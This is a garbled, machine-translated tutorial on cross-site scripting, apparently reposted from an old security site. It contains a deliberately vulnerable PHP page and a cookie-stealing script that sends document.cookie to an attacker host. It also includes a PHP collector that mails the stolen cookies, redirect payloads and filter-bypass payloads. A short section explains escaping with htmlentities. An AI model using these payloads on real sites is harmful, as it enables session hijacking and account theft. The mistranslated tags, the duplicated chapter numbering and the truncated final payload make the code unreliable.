XSS attack and Prevention Guide

Author: Xylitol Original: http://xylitol.free.fr

From: http://keepseo.com/2009/04/xss-attack-defense-guide.htm

 

 

Document directory

 

XSS attack and prevention guide... 1

Chapter 1. Definition of XSS... 1

Chapter 2 XSS vulnerability code... 1

Chapter 3. Using XSS to steal cookies 3

Chapter 4. XSS vulnerability prevention... 4

Chapter 4. XSS attack methods... 4

Chapter 6 XSS attacks using Flash... 6

Chapter 7. XSS attacks on uploaded files... 7

Chapter 8. Phishing using XSS vulnerabilities... 7

 

Chapter 1: XSS Definition
Searching for Cross-Site scripts from Wikipedia to interpreting Cross-zone Scripting (Cross-zone Scripting or Cross Site Scripting) refers to the browser's use of some security solutions with vulnerabilities, this type of attack causes unauthorized cross-site scripting to be executed with higher permissions without authorization, and the execution permission of the script is extended and upgraded by the client (Web browser.
These XSS cross-site scripting vulnerabilities may be:
* The design defect of a Web Browser allows a website to fully trust another high-Permission site (or even high-and low-Permission Areas) under certain conditions and execute scripts of a High-Permission site.
* Website browsers are incorrectly configured. Insecure websites are placed in the high-Trust List of browsers.
* Cross-site scripting vulnerability in trusted sites (privileged regions)
Generally, XSS attacks take two steps. The first is to use the cross-site scripting vulnerability to execute scripts constructed by attackers in a privileged mode, and then use insecure ActiveX controls to execute malicious behaviors. In quiet mode, computers are usually allowed to browse and install malicious code, such as spyware, trojan software, and worms, on the webpage specified by attackers.
Chapter 2 XSS vulnerability code
Open notepad and copy the following code to the current version:
<! DOCTYPE html PUBLIC "-// W3C // dtd xhtml 1.0 Transitional // EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<Html xmlns = "http://www.w3.org/1999/xhtml">
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = iso-8859-1"/>
<Style type = "text/css">
<! --
Body, td, th {
Color: # FFFFFF;
}
Body {
Background-color: #000000;
}
-->
</Style> <title> Simple XSS vulnerability by Xylitol </title>
<Body>
<Form action = "XSS. php" method = "post">
<P align = "center"> <strong> Simple XSS vulnerability by Xylitol </strong> </p>
<Div align = "center">
<Table width = "270" border = "0">
<Tr>
<Td width = "106"> <strong> Search: </strong> </td>
<Td width = "154"> <input name = "Vulnerability" type = "text" id = "Vulnerability"/> </td>
</Tr>
</Table>
<Table width = "268" border = "0">
<Tr>
& Lt; td width = "262" & gt; <div align = "center" & gt;
<Input name = "submit" type = "submit" value = "Search it! "/>
</Div> </td>
</Tr>
</Table>
</Div>
</Form>
</Body>
</Html>

Then, save the page as index.html. And copy the following code to notepad:

<! DOCTYPE html PUBLIC "-// W3C // dtd xhtml 1.0 Transitional // EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<Html xmlns = "http://www.w3.org/1999/xhtml">
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = iso-8859-1"/>
<Title> Search result: </title>
<Style type = "text/css">
<! --
Body, td, th {
Color: # FFFFFF;
}
Body {
Background-color: #000000;
}
-->
</Style> <Body>
<Span class = "alerte"> Search result: </span> & nbsp; <strong> <? Php echo $ _ POST [Vulnerability];?> </Strong> & nbsp;
</Body>
</Html>

Save as Xss. php and close notepad. Use firefoxto open index.html, enter a string in the search box, and press Enter. Enter <script> alert (XSS) </script> in the search box and click send. A prompt window is displayed. This is the cross-site scripting vulnerability.

Chapter 3 Use XSS to steal cookies
Insert the following code into a vulnerable page, such as a message book.

<Script>
Window. open ("http://www.Hax0r.com/cookie.php? Cookies = "+ document. cookie );
</Script>
(Www.Hax0r.com = attacker's website)

Use NotePad to create a file: cookie. php. Copy the following code to the file.
<! DOCTYPE html PUBLIC "-// W3C // dtd xhtml 1.0 Transitional // EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<Html xmlns = "http://www.w3.org/1999/xhtml">
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = iso-8859-1"/>
<Title> Error </title>
<Style type = "text/css">
<! --
Body, td, th {
Color: # FFFFFF;
}
Body {
Background-color: #000000;
}
-->
</Style> <? Mail (email@example.com, Cookie stealed! -Thx xyli :), $ cookies);?>
<Body>
<H2> <strong> Error </strong>-<strong> Access denied </strong> for <? Echo $ _ SERVER ["REMOTE_ADDR"];?> </H2>
</Body>
</Html>
This is not enough. You have to wait for an email to read the stolen cookies.

Chapter 4. XSS vulnerability prevention
How can I fix this vulnerability?

We can use the htmlentities function to fix this vulnerability. Replace the preceding XSS. php 16th line:

<Body>
<Span class = "alerte"> Search result: </span> & nbsp; <strong> <? Php echo $ _ POST [Vulnerability];?> </Strong> & nbsp;
</Body>
Is:

<Body>
<Span class = "alerte"> Search result: </span> & nbsp; <strong> <? Php
If (isset ($ _ POST [Vulnerability]) {echo htmlentities ($ _ POST [Vulnerability]) ;}?> </Strong> & nbsp;
</Body>
You can also use the built-in php functions htmlspecialchars (), htmlentities (), strip_tags (), and so on.

Chapter IV. XSS attack methods
Using XSS for attacks is quite simple. Here we mainly talk about several attack methods ......

Image attack:

Or video flash: <embed src = http://hax0r.com/Haxored.swf

Website redirection: <script> window. open ("http://www.hax0r.com/Haxored.html") </script>

Or: <meta http-equiv = "refresh" content = "0; url = http://hax0r.com/Haxored.html"/>

Bypass filtering to further discover XSS

In fact, it is very simple to bypass htmlspecialchars () filtering. Here are some methods to bypass Filtering:
<META HTTP-EQUIV = "refresh" CONTENT = "0;
URL = http: //; URL = javascript: alert (XSS); ">

<META HTTP-EQUIV = "refresh"
CONTENT = "0; url = javascript: alert (XSS);">

">>< Marquee>

">>< Script> alert (XSS) </script>

>>< Marquee>

"> <Script alert (String. fromCharCode (88,83, 83) </script>

<Iframe <? Php echo chr (11)?> Onload = alert (XSS)> </iframe>

<Div
Style = "x: expression (window. r = 1 )? : Eval (r = 1; alert (String. fromCharCo
De (88,83, 83 ));